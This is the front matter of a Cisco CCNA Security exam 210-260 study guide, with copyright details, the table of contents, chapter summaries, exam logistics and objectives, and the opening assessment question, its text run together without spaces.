ccna security study guide: exam 210-260
TRANSCRIPT
CCNA®
SecurityStudyGuideExam210-260
TroyMcMillan
SeniorAcquisitionsEditor:KenyonBrownDevelopmentEditor:DavidClark
TechnicalEditors:JonBuhagiarandMarkDittmerProductionManager:KathleenWisor
CopyEditor:KimWimpsettEditorialManager:MaryBethWakefield
ExecutiveEditor:JimMinatelBookDesigner:JudyFungandBillGibson
Proofreader:AmySchneiderIndexer:JohnnaVanHooseDinse
ProjectCoordinator,Cover:BrentSavageCoverDesigner:Wiley
CoverImage:@JeremyWoodhouse/GettyImages,Inc.Copyright©2018byJohnWiley&Sons,Inc.,Indianapolis,Indiana
PublishedsimultaneouslyinCanadaISBN:978-1-119-40993-9
ISBN:978-1-119-40991-5(ebk.)ISBN:978-1-119-40988-5(ebk.)
ManufacturedintheUnitedStatesofAmericaNopartofthispublicationmaybereproduced,storedinaretrievalsystemortransmittedinanyformorbyanymeans,electronic,mechanical,photocopying,recording,scanningorotherwise,exceptaspermittedunderSections107or108ofthe1976UnitedStatesCopyrightAct,withouteitherthepriorwrittenpermissionofthePublisher,orauthorizationthroughpaymentoftheappropriateper-copyfeetotheCopyrightClearanceCenter,222RosewoodDrive,Danvers,MA01923,(978)750-8400,fax(978)646-8600.RequeststothePublisherforpermissionshouldbeaddressedtothePermissionsDepartment,JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030,(201)748-6011,fax(201)748-6008,oronlineathttp://www.wiley.com/go/permissions.
LimitofLiability/DisclaimerofWarranty:Thepublisherandtheauthormakenorepresentationsorwarrantieswithrespecttotheaccuracyorcompletenessofthecontentsofthisworkandspecificallydisclaimallwarranties,includingwithoutlimitationwarrantiesoffitnessforaparticularpurpose.Nowarrantymaybecreatedorextendedbysalesorpromotionalmaterials.Theadviceandstrategiescontainedhereinmaynotbesuitableforeverysituation.Thisworkissoldwiththeunderstandingthatthepublisherisnotengagedinrenderinglegal,accounting,orotherprofessionalservices.Ifprofessionalassistanceisrequired,theservicesofacompetentprofessionalpersonshouldbesought.Neitherthepublishernortheauthorshallbeliablefordamagesarisingherefrom.ThefactthatanorganizationorWebsiteisreferredtointhisworkasacitationand/orapotentialsourceoffurtherinformationdoesnotmeanthattheauthororthepublisherendorsestheinformationtheorganizationorWebsitemayprovideorrecommendationsitmaymake.Further,readersshouldbeawarethatInternetWebsiteslistedinthisworkmayhavechangedordisappearedbetweenwhenthisworkwaswrittenandwhenitisread.Forgeneralinformationonourotherproductsandservicesortoobtaintechnicalsupport,pleasecontactourCustomerCareDepartmentwithintheU.S.at(877)762-2974,outsidetheU.S.at(317)572-3993orfax(317)572-4002.
Wileypublishesinavarietyofprintandelectronicformatsandbyprint-on-demand.Somematerialincludedwithstandardprintversionsofthisbookmaynotbeincludedine-booksorinprint-on-demand.IfthisbookreferstomediasuchasaCDorDVDthatisnotincludedintheversionyoupurchased,youmaydownloadthismaterialathttp://booksupport.wiley.com.FormoreinformationaboutWileyproducts,visitwww.wiley.com.LibraryofCongressControlNumber:2017962360
TRADEMARKS:Wiley,theWileylogo,andtheSybexlogoaretrademarksorregisteredtrademarksofJohnWiley&Sons,Inc.and/oritsaffiliates,intheUnitedStatesandothercountries,andmaynotbeusedwithoutwrittenpermission.CCNAisaregisteredtrademarkofCiscoTechnologies,Inc.Allothertrademarksarethepropertyoftheirrespectiveowners.JohnWiley&Sons,Inc.isnotassociatedwithanyproductorvendormentionedinthisbook.
Formybestfriend,WadeLong,forjustbeingagoodfriend.
AcknowledgmentsSpecialthanksgotoDavidClarkforkeepingmeonscheduleandensuringallthedetailsarecorrect.Also,I’dliketothankJonBuhagiarfortheexcellenttechnicaleditthatsavedmefrommyselfattimes.Finally,asalways,I’dliketoacknowledgeKenyonBrownforhiscontinuedsupportofallmywritingefforts.
AbouttheAuthorTroyMcMillanwritespracticetests,studyguides,andonlinecoursematerialsforKaplanITTraining,whilealsorunninghisownconsultingandtrainingbusiness.Heholdsmorethan30industrycertificationsandalsoappearsintrainingvideosforOnCourseLearningandPearsonPress.Troycanbereachedatmcmillantroy@hotmail.com.
ContentsAcknowledgmentsAbouttheAuthorIntroduction
WhatDoesThisBookCover?InteractiveOnlineLearningEnvironmentandTestBankWhoShouldReadThisBookHowtoUseThisBookHowDoYouGoAboutTakingtheExam?CertificationExamPolicies
AssessmentTestAnswerstoAssessmentTestChapter1UnderstandingSecurityFundamentals
GoalsofSecurityNetworkTopologiesCommonNetworkSecurityZonesSummaryExamEssentialsReviewQuestions
Chapter2UnderstandingSecurityThreatsCommonNetworkAttacksSocialEngineeringMalwareDataLossandExfiltrationSummaryExamEssentialsReviewQuestions
Chapter3UnderstandingCryptographySymmetricandAsymmetricEncryptionHashingAlgorithmsKeyExchangePublicKeyInfrastructure
SummaryExamEssentialsReviewQuestions
Chapter4SecuringtheRoutingProcessSecuringRouterAccessImplementingOSPFRoutingUpdateAuthenticationSecuringtheControlPlaneSummaryExamEssentialsReviewQuestions
Chapter5UnderstandingLayer2AttacksUnderstandingSTPAttacksUnderstandingARPAttacksUnderstandingMACAttacksUnderstandingCAMOverflowsUnderstandingCDP/LLDPReconnaissanceUnderstandingVLANHoppingUnderstandingDHCPSpoofingSummaryExamEssentialsReviewQuestions
Chapter6PreventingLayer2AttacksConfiguringDHCPSnoopingConfiguringDynamicARPInspectionConfiguringPortSecurityConfiguringSTPSecurityFeaturesDisablingDTPVerifyingMitigationsSummaryExamEssentialsReviewQuestions
Chapter7VLANSecurityNativeVLANsPVLANs
ACLsonSwitchesSummaryExamEssentialsReviewQuestions
Chapter8SecuringManagementTrafficIn-BandandOut-of-BandManagementSecuringNetworkManagementSecuringAccessthroughSNMPv3SecuringNTPUsingSCPforFileTransferSummaryExamEssentialsReviewQuestions
Chapter9Understanding802.1xandAAA802.1xComponentsRADIUSandTACACS+TechnologiesConfiguringAdministrativeAccesswithTACACS+UnderstandingAuthenticationandAuthorizationUsingACSandISEUnderstandingtheIntegrationofActiveDirectorywithAAASummaryExamEssentialsReviewQuestions
Chapter10SecuringaBYODInitiativeTheBYODArchitectureFrameworkTheFunctionofMobileDeviceManagementSummaryExamEssentialsReviewQuestions
Chapter11UnderstandingVPNsUnderstandingIPsecUnderstandingAdvancedVPNConceptsSummaryExamEssentialsReviewQuestions
Chapter12ConfiguringVPNsConfiguringRemoteAccessVPNsConfiguringSite-to-SiteVPNsSummaryExamEssentialsReviewQuestions
Chapter13UnderstandingFirewallsUnderstandingFirewallTechnologiesStatefulvs.StatelessFirewallsSummaryExamEssentialsReviewQuestions
Chapter14ConfiguringNATandZone-BasedFirewallsImplementingNATonASA9.xConfiguringZone-BasedFirewallsSummaryExamEssentialsReviewQuestions
Chapter15ConfiguringtheFirewallonanASAUnderstandingFirewallServicesUnderstandingModesofDeploymentUnderstandingMethodsofImplementingHighAvailabilityUnderstandingSecurityContextsConfiguringASAManagementAccessConfiguringCiscoASAInterfaceSecurityLevelsConfiguringSecurityAccessPoliciesConfiguringDefaultCiscoModularPolicyFramework(MPF)SummaryExamEssentialsReviewQuestions
Chapter16IntrusionPreventionIPSTerminologyEvasionTechniquesIntroducingCiscoFireSIGHT
UnderstandingModesofDeploymentPositioningoftheIPSwithintheNetworkUnderstandingFalsePositives,FalseNegatives,TruePositives,andTrueNegativesSummaryExamEssentialsReviewQuestions
Chapter17ContentandEndpointSecurityMitigatingEmailThreatsMitigatingWeb-BasedThreatsMitigatingEndpointThreatsSummaryExamEssentialsReviewQuestions
AppendixAnswerstoReviewQuestionsChapter1:UnderstandingSecurityFundamentalsChapter2:UnderstandingSecurityThreatsChapter3:UnderstandingCryptographyChapter4:SecuringtheRoutingProcessChapter5:UnderstandingLayer2AttacksChapter6:PreventingLayer2AttacksChapter7:VLANSecurityChapter8:SecuringManagementTrafficChapter9:Understanding802.1xandAAAChapter10:SecuringaBYODInitiativeChapter11:UnderstandingVPNsChapter12:ConfiguringVPNsChapter13:UnderstandingFirewallsChapter14:ConfiguringNATandZone-BasedFirewallsChapter15:ConfiguringtheFirewallonanASAChapter16:IntrusionPreventionChapter17:ContentandEndpointSecurity
AdvertEULA
ListofTablesChapter1
TABLE1.1
Chapter3
TABLE3.1
TABLE3.2
Chapter9
TABLE9.1
Chapter16
TABLE16.1
ListofIllustrationsChapter1
FIGURE1.1Defenseindepth
FIGURE1.2Securitycycle
FIGURE1.3Campusareanetwork
Chapter2
FIGURE2.1Pingscanwithnmap
FIGURE2.2TCPheader
FIGURE2.3NULLscan
FIGURE2.4XMASscan
FIGURE2.5TCPhandshake
FIGURE2.6SYNflood
FIGURE2.7Ping-of-deathpacket
FIGURE2.8DirectDDoS
FIGURE2.9Smurfattack
Chapter3
FIGURE3.1ROT13Caesarcipher
FIGURE3.2Vigenèrecipher
FIGURE3.3ECBprocess
FIGURE3.4CBCprocess
FIGURE3.5Hashprocess
FIGURE3.6HMACprocess
FIGURE3.7Digitalsignatureprocess
FIGURE3.8PKIencryption
FIGURE3.9PKIdigitalsignature
FIGURE3.10SSLprocess
FIGURE3.11PKIhierarchy
FIGURE3.12Crosscertification
FIGURE3.13Viewingcertificates
Chapter4
FIGURE4.1CoPP
FIGURE4.2Modularpolicyframework
Chapter5
FIGURE5.1STPattack
FIGURE5.2ARPprocess
FIGURE5.3ARPcachepoisoning
FIGURE5.4MACspoofing
FIGURE5.5CAMoverflow
FIGURE5.6Switchspoofing
FIGURE5.7Doubletagging
FIGURE5.8DHCPspoofing
Chapter6
FIGURE6.1DHCPsnooping
FIGURE6.2DAIinaction
FIGURE6.3BPDUGuardinaction
Chapter7
FIGURE7.1PVLANs
FIGURE7.2PVLANproxyattack
Chapter8
FIGURE8.1PartialMIB
FIGURE8.2NTPauthenticationprocess
Chapter9
FIGURE9.1802.1x
Chapter10
FIGURE10.1ISEcontext-basedaccess
FIGURE10.2CMD
FIGURE10.3SXPandSGT
FIGURE10.4Permissionmatrix
FIGURE10.5MDMwithIDE
FIGURE10.6ISEauthorizationpolicyintegration
Chapter11
FIGURE11.1Diffie-Hellman
FIGURE11.2IKEphase1
FIGURE11.3MatchingISAKMPparameters
FIGURE11.4AHprocess
FIGURE11.5AHintunnelmode
FIGURE11.6ESPintunnelmode
FIGURE11.7AHintransportmode
FIGURE11.8ESPintransportmode
FIGURE11.9IPv6headerwithextensions
FIGURE11.10Theneedforhairpinning
FIGURE11.11Hairpinconfiguration
FIGURE11.12Splittunneling
FIGURE11.13Preferences(Part2)window
FIGURE11.14NATtraversal
Chapter12
FIGURE12.1SupportedSSL/TLSalgorithms
Chapter13
FIGURE13.1TCPthree-wayhandshake
FIGURE13.2Statefulfirewalloperation
Chapter14
FIGURE14.1Multipleclassmaps
FIGURE14.2Reuseofclassmaps
FIGURE14.3Defaultpolicies
FIGURE14.4Defaultpolicies(self-zone)
Chapter15
FIGURE15.1Active/Standbyfailover
FIGURE15.2Active/Activefailover
FIGURE15.3Clustering
FIGURE15.4Securitycontexts
FIGURE15.5Securitylevelsinaction
Chapter16
FIGURE16.1IPheaderfragmentationflags
FIGURE16.2Fragmentationprocess
FIGURE16.3Fragmentationattack
FIGURE16.4Injectionattack
FIGURE16.5SPAN
FIGURE16.6Tap
FIGURE16.7Inlinemode
FIGURE16.8Outsidedeployment
FIGURE16.9DMZdeployment
FIGURE16.10Insidedeployment
Chapter17
FIGURE17.1Fileretrospection
FIGURE17.2ESAinbound
FIGURE17.3ESAoutbound
FIGURE17.4Incomingmailprocessing
FIGURE17.5Outgoingmailprocessing
IntroductionTheCCNASecuritycertificationprogramisoneoftheelectivepathsyoucantakewhenachievingtheCCNA.ItrequirespassingtheCCENTexam(100-105)andthenpassingtheCCNASecurityexam(210-260).
TheCiscoSecurityexamobjectivesareperiodicallyupdatedtokeepthecertificationapplicabletothemostrecenthardwareandsoftware.Thisisnecessarybecauseatechnicianmustbeabletoworkonthelatestequipment.Themostrecentrevisionstotheobjectives—andtothewholeprogram—wereintroducedin2016andarereflectedinthisbook.
ThisbookandtheSybexCCNASecurity+CompleteStudyGuide(boththeStandardandDeluxeeditions)aretoolstohelpyouprepareforthiscertification—andforthenewareasoffocusofamodernservertechnician’sjob.
WhatIstheCCNASecurityCertification?CiscoCertifiedNetworkAssociateSecurity(CCNASecurity)validatesassociate-levelknowledgeandskillsrequiredtosecureCisconetworks.WithaCCNASecuritycertification,anetworkprofessionaldemonstratestheskillsrequiredtodevelopasecurityinfrastructure,recognizethreatsandvulnerabilitiestonetworks,andmitigatesecuritythreats.TheCCNASecuritycurriculumemphasizescoresecuritytechnologies;theinstallation,troubleshooting,andmonitoringofnetworkdevicestomaintainintegrity,confidentiality,andavailabilityofdataanddevices;andcompetencyinthetechnologiesthatCiscousesinitssecuritystructure.
TheCCNASecuritycertificationisn’tawardeduntilyou’vepassedthetwotests.Forthelatestpricingontheexamsandupdatestotheregistrationprocedures,callPearsonVUEat(877)551-7587.YoucanalsogotoPearsonVUE’swebsiteatwww.vue.comforadditionalforinformationortoregisteronline.Ifyouhavefurtherquestionsaboutthescopeoftheexams,seehttps://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-security.html.
WhatDoesThisBookCover?Hereisaglanceatwhat’sineachchapter.
Chapter1:UnderstandingSecurityFundamentalscoverscommonsecurityprinciplessuchastheCIAtriad;commonsecuritytermssuchasrisk,vulnerability,andthreat;theproperapplicationofcommonsecurityzones,suchasintranet,DMZ,andextranets;adiscussionofnetworktopologiesasseenfromtheperspectiveoftheCiscoCampusAreanetwork;andmethodsofnetworksegmentationsuchasVLANs.
Chapter2:UnderstandingSecurityThreatscoverscommonnetworkattacksandtheirmotivations;attackvectorssuchasmaliciousandnon-maliciousinsidersandoutsiders,terrorists,spies,andterminatedpersonnel;variousmethodsusedtoperformnetworkreconnaissancesuchaspingscansandportscans;typesofmalware;andtheexfiltrationofsensitivedatasuchasIP,PII,andcreditcarddata.
Chapter3:UnderstandingCryptographycoverssymmetricandasymmetrickeycryptography,thehashingprocess,majorhashingalgorithms,PKIandthecomponentsthatmakeitfunction,andcommonattacksoncryptography.
Chapter4:SecuringtheRoutingProcesscoversmethodsofsecuringadministrativeaccesstotherouter,IOSprivilegelevels,IOSrole-basedCLIaccess,CiscoIOSresilientconfiguration,authenticationforrouterupdatesforbothOSPFandEIGRP,andcontrolplanepolicing.
Chapter5:UnderstandingLayer2AttackscoversSTPattackssuchasrogueswitches,ARPspoofing,MACspoofing,andCAMoverflow.ItalsodiscussesboththevalueandthedangerinusingCDPandLLDP.Finally,youwilllearnhowVLANhoppingattacksareperformed.
Chapter6:PreventingLayer2AttackscoversDHCPsnooping,DAIandhowitcanpreventARPpoisoningattacks,preventingMACoverflowattacksandtheintroductionofunauthorizeddevicestoswitchportsbyusingportsecurity,andtheuseofBPDUGuard,RootGuard,andLoopGuard,allSTPfeaturesdesignedtopreventchangestotheSTPtopology.
Chapter7:VLANSecuritycoverspreventingVLANhoppingattacksthattakeadvantageofthenativeVLAN;privateVLANs;settingportsaspromiscuous,community,andisolated;thePVLANEdgefeature;andusingACLstopreventaPVLANproxyattack.
Chapter8:SecuringManagementTrafficcoversmanagingdevicesin-bandandout-of-band,methodsofsecuringmanagementinterfacesincludingenablingtheHTTPSserver,securingSNMPv3withasecuritypolicy,applyingpasswordstoallmanagementinterfaces,andusingSSHforremotemanagement,typesofbannermessage,andsecuringtheNTPprotocol.
Chapter9:Understanding802.1xandAAAcoversAAAservicethatcanbeprovidedbyTACACS+andRADIUSservers,configuringadministrativeaccesstoarouterusing
TACACS+,howAAAcanbeintegratedwithActiveDirectory,theCiscoimplementationsofaRADIUSserverincludingtheCiscoSecureAccessControlServer(ACS)andtheCiscoIdentityServicesEngine(ISR),andthefunctionsofvarious802.1Xcomponents.
Chapter10:SecuringaBYODInitiativecoverschallengesinvolvedinsupportingaBYODinitiative,componentsprovidedbyCiscoforthisincludingtheCiscoIntegratedServicesEngine(ISE),andtheCiscoTrustSecprovisioningandmanagementplatform.ItalsocoversadvancedfeaturesofCiscoISE,includingdownloadableACLs(dACLs),automaticVLANassignment,securitygroupaccess(SGAs),changeofauthorization(COA),andpostureassessment.FurtherwediscusstheauthenticationmechanismsISEcanaccept,including802.1x,MACauthenticationbypass(MAB),andwebauthentication(WebAuth).Finally,weendthechaptercoveringthethreemainfunctionsofTrustSec.
Chapter11:UnderstandingVPNscoversIPsecandthesecurityservicesitprovides;thecomponentsofIPsecsuchasISAKMP,IKE,AH,andESP;howtousehairpinningtoallowtrafficbetweentwohoststoconnecttothesameVPNinterface;andsplittunnelinganditsbenefits.
Chapter12:ConfiguringVPNscoversthevalueoftheCiscoclientlessSSLVPNandthestepsrequiredtoconfigureit,theCiscoAnyConnectSSLVPN,modulesintheCiscoAnyConnectclientthatcanprovideendpointpostureassessment,andhowtoimplementanIPsecsite-to-siteVPNwithpresharedkeyauthentication.
Chapter13:UnderstandingFirewallscoversvariousfirewalltechnologiessuchasproxy,application,personal,andstatefulfirewalls,withstatefulfirewallscoveredingreaterdetailanddescribedinrelationtotheoperationofthesefirewallsandtheTCPthree-wayhandshake.Finallyyoulearnwhatiscontainedinthestatetableofastatefulfirewall.
Chapter14:ConfiguringNATandZone-BasedFirewallscoversthreeformsofNAT:staticNAT,dynamicNAT,andPAT;theNAToptionsavailableintheASA,thebenefitsofNAT;andhowtoconfigureitandverifyitsoperation.Youwilllearnaboutclassmaps,policymaps,andservicepoliciesandtheirrespectivefunctionsinazone-basedfirewall.Finally,thestepstoconfigureandverifyazone-basedfirewallendthechapter.
Chapter15:ConfiguringtheFirewallonanASAcovershowtosetuptheASAsoyoucanremotelyadministeritusingtheASDM,thedefaultsecuritypoliciesthatareinplace,howthedefaultglobalpolicyinteractswithconfiguredpolicies,howinterfacesecuritylevelsaffecttrafficflows,howtheCiscoModularPolicyframeworkisusedtocreatepolicies;thedifferencebetweenatransparentandroutefirewall;andhighavailabilitysolutionsincludingactive-active,active-passive,andclusteringapproaches.
Chapter16:IntrusionPreventioncoversgeneralIPSconceptssuchasnetwork-basedandhost-baseddeployments;modesofdeploymentsuchasinline,SPAN,andtap;thepositioningoptionsavailable;falsepositivesandfalsenegatives;howrulesandsignaturesareusedintheprocessofidentifyingpotentialattacks;andtriggeractionsofwhichanIPSmightbecapable,suchasdropping,resetting,andalerting.
Chapter17:ContentandEndpointSecuritycoversmitigationtechniquesavailablewhen
usingtheCiscoEmailSecurityAppliance,includingreputationandcontext-basedfiltering,andtheCiscoWebSecurityAppliance,whichusesblacklisting,URLfiltering,andmalwarescanningtosecurewebtrafficandwebapplications.Finally,thechapterdiscussesendpointprotectionprovidedbytheCiscoIdentityServicesEngineandCiscoTrustSectechnology.
InteractiveOnlineLearningEnvironmentandTestBankWe’veputtogethersomereallygreatonlinetoolstohelpyoupasstheCCNASecurityexam.TheinteractiveonlinelearningenvironmentthataccompaniestheCCNASecurityexamcertificationguideprovidesatestbankandstudytoolstohelpyoupreparefortheexam.Byusingthesetoolsyoucandramaticallyincreaseyourchancesofpassingtheexamonyourfirsttry.
Theonlinetestbankincludesthefollowing:
SampleTestsManysampletestsareprovidedthroughoutthisbookandonline,includingtheAssessmentTest,whichyou’llfindattheendofthisintroduction,andtheChapterTeststhatincludethereviewquestionsattheendofeachchapter.Inaddition,therearetwobonuspracticeexams.Usethesequestionstotestyourknowledgeofthestudyguidematerial.Theonlinetestbankrunsonmultipledevices.
FlashcardsTheonlinetextbankincludes100flashcardsspecificallywrittentohityouhard,sodon’tgetdiscouragedifyoudon’taceyourwaythroughthematfirst!They’retheretoensurethatyou’rereallyreadyfortheexam.Andnoworries—armedwiththereviewquestions,practiceexams,andflashcards,you’llbemorethanpreparedwhenexamdaycomes!Questionsareprovidedindigitalflashcardformat(aquestionfollowedbyasinglecorrectanswer).Youcanusetheflashcardstoreinforceyourlearningandprovidelast-minutetestprepbeforetheexam.
ResourcesAglossaryofkeytermsfromthisbookandtheirdefinitionsareavailableasafullysearchablePDF.
Gotohttp://www.wiley.com/go/Sybextestpreptoregisterandgainaccessto
thisinteractiveonlinelearningenvironmentandtestbankwithstudytools.
WhoShouldReadThisBookIfyouwanttoacquireasolidfoundationinmanagingsecurityonCiscodevicesoryourgoalistopreparefortheexamsbyfillinginanygapsinyourknowledge,thisbookisforyou.You’llfindclearexplanationsoftheconceptsyouneedtograspandplentyofhelptoachievethehighlevelofprofessionalcompetencyyouneedinordertosucceedinyourchosenfield.
IfyouwanttobecomecertifiedasaCCNASecurityprofessional,thisbookisdefinitelywhatyouneed.However,ifyoujustwanttoattempttopasstheexamwithoutreallyunderstandingthebasicsofpersonalcomputers,thisguideisn’tforyou.It’swrittenforpeoplewhowanttoacquireskillsandknowledgeofserversandstoragesystems.
HowtoUseThisBookIfyouwantasolidfoundationfortheseriouseffortofpreparingfortheCiscoCCNASecurityexam,thenlooknofurther.We’vespenthundredsofhoursputtingtogetherthisbookwiththesoleintentionofhelpingyoutopasstheexamaswellasreallylearnabouttheexcitingfieldofnetworksecurity!
Thisbookisloadedwithvaluableinformation,andyouwillgetthemostoutofyourstudytimeifyouunderstandwhythebookisorganizedthewayitis.
So,tomaximizeyourbenefitfromthisbook,Irecommendthefollowingstudymethod:
1. Taketheassessmenttestthat’sprovidedattheendofthisintroduction.(Theanswersareattheendofthetest.)It’sokayifyoudon’tknowanyoftheanswers;that’swhyyouboughtthisbook!Carefullyreadovertheexplanationsforanyquestionsyougetwrongandnotethechaptersinwhichthematerialrelevanttothemiscovered.Thisinformationshouldhelpyouplanyourstudystrategy.
2. Studyeachchaptercarefully,makingsureyoufullyunderstandtheinformationandthetestobjectiveslistedatthebeginningofeachone.Payextra-closeattentiontoanychapterthatincludesmaterialcoveredinquestionsyoumissed.
3. Completeallhands-onlabsineachchapter,referringtothetextofthechaptersothatyouunderstandthereasonforeachstepyoutake.
4. Answerallofthereviewquestionsrelatedtoeachchapter.(TheanswersappearinAppendix.)Notethequestionsthatconfuseyou,andstudythetopicstheycoveragainuntiltheconceptsarecrystalclear.Andagain—donotjustskimthesequestions!Makesureyoufullycomprehendthereasonforeachcorrectanswer.Rememberthatthesewillnotbetheexactquestionsyouwillfindontheexam,butthey’rewrittentohelpyouunderstandthechaptermaterialandultimatelypasstheexam!
5. Tryyourhandatthepracticequestionsthatareexclusivetothisbook.Thequestionscanbefoundathttp://www.sybex.com/go/ccnasecuritystudyguide.
6. Testyourselfusingalltheflashcards,whicharealsofoundatthedownloadlink.Thesearebrand-newandupdatedflashcardstohelpyoupreparefortheCCNASecurityexamandawonderfulstudytool!
Tolearneverybitofthematerialcoveredinthisbook,you’llhavetoapplyyourselfregularly,andwithdiscipline.Trytosetasidethesametimeperiodeverydaytostudy,andselectacomfortableandquietplacetodoso.I’mconfidentthatifyouworkhard,you’llbesurprisedathowquicklyyoulearnthismaterial!
Ifyoufollowthesestepsandreallystudyinadditiontousingthereviewquestions,thepracticeexams,andtheelectronicflashcards,itwouldactuallybehardtofailtheCCNASecurityexam.ButunderstandthatstudyingfortheCiscoexamsisalotlikegettinginshape—ifyoudonotgotothegymeveryday,it’snotgoingtohappen!
AccordingtotheCiscowebsitetheCiscoCCNASecurityexamdetailsareasfollows:
Examcode:210-260
Examdescription:Thisexamteststhecandidate’sknowledgeofsecurenetworkinfrastructure,understandingcoresecurityconcepts,managingsecureaccess,VPNencryption,firewalls,intrusionprevention,webandemailcontentsecurity,andendpointsecurityusingCiscoroutersandtheASA9x.
Numberofquestions:60–70
Typeofquestions:multiplechoice,draganddrop,testlet,simulation
Lengthoftest:90minutes
Passingscore:860(onascaleof100–900)
Language:English
HowDoYouGoAboutTakingtheExam?Whenthetimecomestoscheduleyourexamyouwillneedtocreateanaccountathttp://www.pearsonvue.com/cisco/andregisterforyourexam.CiscotestingisprovidedbytheirglobaltestingpartnerPearsonVUE.Youcanlocateyourclosesttestingcenterathttps://home.pearsonvue.com/.Youcanscheduleatanyofthelistedtestingcenters.
Topurchasetheexam,youwillneedtobuyanexamvoucherfromCisco.Thevoucherisacodetheyprovideyoutousetoscheduletheexam.Informationonpurchasingavouchercanbefoundat:http://www.pearsonvue.com/vouchers/pricelist/cisco.asp.
Whenyouhaveavoucherandhaveselectedatestingcenter,youcanscheduletheCisco210-260exambyfollowingthislink:http://www.pearsonvue.com/cisco/.ThiswilltakeyoutothePearsonVUEwebsiteandfromhereyoucanalsolocateatestingcenterorpurchasevouchersifyouhavenotalreadydoneso.
WhenyouhaveregisteredfortheCCNASecuritycertificationexamyouwillreceiveaconfirmatione-mailthatsuppliesyouwithalloftheinformationyouwillneedtotaketheexam.Remembertotakeaprintoutofthise-mailwithyoutothetestingcenter.
CertificationExamPoliciesForthemostcurrentinformationregardingCiscoexampolicies,itisrecommendedthatyoufollowthehttps://www.cisco.com/c/en/us/training-events/training-certifications/exams/policies.htmllinktobecomefamiliarwithCiscopolicies.Itcontainsa
largeamountofusefulinformationregarding:
Exampolicyrequirements
Agerequirementsandpoliciesconcerningminors
Certificationandconfidentialityagreement
Candidateidentificationandauthentication
Candidaterightsandresponsibilities
Confidentialityandagreements
Embargoedcountrypolicy
Privacy
Examandtestingpolicies
Conduct
Confidentialityandagreements
Examdiscounts,vouchers,andpromotionalcodes
Examviolations
Preliminaryscorereport
Retakingexams
Postexampolicies
Certificationtrackingsystem
Correspondence
Examrecertification
Examretirement
Examscoring
Logoguidelines
TipsforTakingYourExamTheCiscoCCNASecurityexamcontains60–90multiplechoice,draganddrop,testlet,andsimulationitemquestions,andmustbecompletedin90minutesorless.Thisinformationmaychangeovertimeanditisadvisedtocheckwww.cisco.comforthelatestupdates.
Manyquestionsontheexamofferanswerchoicesthatatfirstglancelookidentical—especiallythesyntaxquestions!Soremembertoreadthroughthechoicescarefullybecauseclosejustdoesn’tcutit.Ifyougetinformationinthewrongorderorforgetonemeaslycharacter,youmaygetthequestionwrong.So,topractice,dothepracticeexamsandhands-on
exercisesinthisbook’schaptersoverandoveragainuntiltheyfeelnaturaltoyou;also,andthisisveryimportant,dotheonlinesampletestuntilyoucanconsistentlyanswerallthequestionscorrectly.Relax,readthequestionoverandoveruntilyouare100%clearonwhatitisasking,andthenyoucanusuallyeliminateafewoftheobviouslywronganswers.
Herearesomegeneraltipsforexamsuccess:
Arriveearlyattheexamcentersoyoucanrelaxandreviewyourstudymaterials.
Readthequestionscarefully.Don’tjumptoconclusions.Makesureyou’reclearaboutexactlywhateachquestionasks.“Readtwice,answeronce!”
Askforapieceofpaperandpencilifitisofferedtotakedownquicknotesandmakesketchesduringtheexam.
Whenansweringmultiple-choicequestionsthatyou’renotsureabout,usetheprocessofeliminationtogetridoftheobviouslyincorrectanswersfirst.Doingthisgreatlyimprovesyouroddsifyouneedtomakeaneducatedguess.
Afteryoucompleteanexam,you’llgetimmediatenotificationofyourpassorfailstatus,aprintedexaminationscorereportthatindicatesyourpassorfailstatus,andyourexamresultsbysection.(Thetestadministratorwillgiveyoutheprintedscorereport.)TestscoresareautomaticallyforwardedtoCiscoafteryoutakethetest,soyoudon’tneedtosendyourscoretothem.Ifyoupasstheexam,you’llreceiveconfirmationfromCiscoandapackageinthepostwithanicedocumentsuitableforframingshowingthatyouarenowaCiscocertifiedengineer.
ExamObjectivesCiscogoestogreatlengthstoensurethatitscertificationprogramsaccuratelyreflecttheITindustry’sbestpractices.ThecompanydoesthisbyestablishingCornerstoneCommitteesforeachofitsexamprograms.EachcommitteecomprisesasmallgroupofITprofessionals,trainingproviders,andpublisherswhoareresponsibleforestablishingtheexam’sbaselinecompetencylevelandwhodeterminetheappropriatetargetaudiencelevel.
Oncethesefactorsaredetermined,Ciscosharesthisinformationwithagroupofhand-selectedsubject-matterexperts(SMEs).Thesefolksarethetruebrainpowerbehindthecertificationprogram.Theyreviewthecommittee’sfindings,refinethem,andshapethemintotheobjectivesyouseebeforeyou.Ciscocallsthisprocessajobtaskanalysis(JTA).
Finally,Ciscoconductsasurveytoensurethattheobjectivesandweightingstrulyreflectthejobrequirements.OnlythencantheSMEsgotoworkwritingthehundredsofquestionsneededfortheexam.And,inmanycases,theyhavetogobacktothedrawingboardforfurtherrefinementsbeforetheexamisreadytogoliveinitsfinalstate.So,restassured,thecontentyou’reabouttolearnwillserveyoulongafteryoutaketheexam.
Ciscoalsopublishesrelativeweightingsforeachoftheexam’sobjectives.Thefollowingtableliststheobjectivedomainsandtheextenttowhichthey’rerepresentedoneachexam.
210-260ExamDomains %ofExam1.0SecurityConcepts 12%2.0SecureAccess4.0Security 14%3.0VPN 17%4.0SecureRoutingandSwitching 18%5.0CiscoFirewallTechnologies 18%6.0IPS 9%7.0ContentandEndpointSecurity 12%Total 100%
210-260SubDomains Chapters1.2Commonsecuritythreats 21.3Cryptographyconcepts 21.4Describenetworktopologies 32.1Securemanagement 82.2AAAconcepts 92.3802.1xauthentication 92.4BYOD 103.1VPNconcepts 113.2RemoteaccessVPN 123.3Site-to-siteVPN 124.1SecurityonCiscorouters 44.2Securingroutingprotocols 44.3Securingthecontrolplane 44.4CommonLayer2attacks 54.5Mitigationprocedures 64.6VLANsecurity 75.1Describeoperationalstrengthsandweaknessesofthedifferentfirewalltechnologies
13
5.2Comparestatefulvs.statelessfirewalls 135.3ImplementNATonCiscoASA9.x 145.4Implementzone-basedfirewall 145.5FirewallfeaturesontheCiscoAdaptiveSecurityAppliance(ASA)9.x 156.1DescribeIPSdeploymentconsiderations 166.2DescribeIPStechnologies 167.1Describemitigationtechnologyforemail-basedthreats 177.2Describemitigationtechnologyforweb-basedthreats 177.3Describemitigationtechnologyforendpointthreats 17
AssessmentTest1. Whenyouareconcernedwithpreventingdatafromunauthorizededitsyouareconcerned
withwhichofthefollowing?
A. integrity
B. confidentiality
C. availability
D. authorization
